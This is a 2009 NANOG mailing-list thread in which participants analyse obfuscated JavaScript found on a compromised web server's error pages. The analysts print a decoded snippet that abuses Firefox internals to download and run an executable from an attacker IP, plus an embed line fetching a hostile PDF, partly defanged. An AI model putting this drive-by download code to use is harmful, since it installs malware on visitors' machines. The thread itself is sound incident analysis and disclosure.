Malicious code just found on web server

Jake Mailinglists jbabbinlists at gmail.com
Fri Apr 17 17:39:14 CDT 2009


Nice, bad code is actually on all of the error (404) pages for the site as
well as some other php pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decode the code attempts multiple attacks to try and get the victim to
download an executable

   hxxp://77.92.158.122/webmail/inc/web/load.php


Virustotal results (3/40)
http://www.virustotal.com/analisis/180fc9b96543139b8328f2ae0a2d1bf3


Also this code appears to be trying to exploit specific browser types
(Chrome and Mozilla in particular) as can be seen from this code snippet of
the decode.

(Commented out each line just in case someone has a browser that will try
and render this)

//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding:
url('chrome://xbl-marquee/content/xbl-marquee.xml#marquee-horizontal');");
//document.body.appendChild(aaa_2626aKiupwzqp);
//var aaa_2626aLiupwzqp = aaa_2626aKiupwzqp.stop.eval.call(null,
"Function");
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var
//file=C.classes['@
mozilla.org/file/local;1'].createInstance(C.interfaces.nsILocalFile);
file.initW
//ithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return
C.classes['@
mozilla.org/process/util;1'].createInstance(C.interfaces.nsIProcess);
//}")();
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){
//io=C.classes['@
mozilla.org/network/io-service;1'].getService(C.interfaces.nsIIOService);source=i
//o.newURI('http://77.92.158.122/webmail/inc/web/load.php
','UTF8',null);persist=C.classes['@
mozilla.org/embedding/browser/nsWebBrowserPersist;1'].createI//nstance(C.int
//erfaces.nsIWebBrowserPersist);persist.persistFlags=8192|4096;persist.saveURI(source,null,null,null,null,file);
return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return
persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) {
process.init(file); process.run(false,[],0); }")();


Also attempts to download a hostile PDF file from a subdirectory underneath
this one which was created with a demo copy of Foxit.
    hxxp://77.92.158.122/webmail/inc/web/include/two.pdf

INFO:
Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)

There appear to be several other attacks within this code I can upload or
update this thread if you are interested in the other attacks.


Jake

On Fri, Apr 17, 2009 at 6:34 PM, Chris Mills <securinate at gmail.com> wrote:

> You beat me to it.
>
> -ChrisAM
>
> On Fri, Apr 17, 2009 at 6:31 PM, Paul Ferguson <fergdawgster at gmail.com>
> wrote:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > On Fri, Apr 17, 2009 at 3:15 PM, Paul Ferguson <fergdawgster at gmail.com>
> > wrote:
> >
> >>
> >> On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com>
> >> wrote:
> >>
> >>> I took a quick look at the code... formatted it in a pastebin here:
> >>> http://pastebin.com/m7b50be54
> >>>
> >>> That javascript writes this to the page (URL obscured):
> >>> document.write("<embed
> >>> src=\"hXXp://
> 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|<http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C>
> >>> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
> >>> type=\"application/pdf\"></embed>");
> >>>
> >>> The 1.2.3.4 in the URL is my public IP address (I changed that).
> >>>
> >>> Below the javascript, it grabs a PDF:
> >>> <embed src="include/two.pdf" width="1" height="0"
> >>> style="border:none"></embed>
> >>>
> >>> That PDF is on the site, I haven't looked at it yet though.
> >>>
> >>
> >> Most likely a file that exploits a well-known vulnerability in Adobe
> >> Reader, which in turn probably loads malware from yet another location.
> >>
> >> We've been seeing a lot of this lately.
> >>
> >
> > Yes, definitely malicious:
> >
> > http://www.virustotal.com/analisis/89db7dec6cc786227462c947e4cb4a9b
> >
> > - - ferg
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGP Desktop 9.5.3 (Build 5003)
> >
> > wj8DBQFJ6QMwq1pz9mNUZTMRAqJZAKCEkD0KcifnJIhtex4nP6grIFGKzwCgnE1w
> > /K0hKsJiAz4RGu8VQkyP+js=
> > =AzJq
> > -----END PGP SIGNATURE-----
> >
> >
> >
> > --
> > "Fergie", a.k.a. Paul Ferguson
> >  Engineering Architecture for the Internet
> >  fergdawgster(at)gmail.com
> >  ferg's tech blog: http://fergdawg.blogspot.com/
> >
>
>



More information about the NANOG mailing list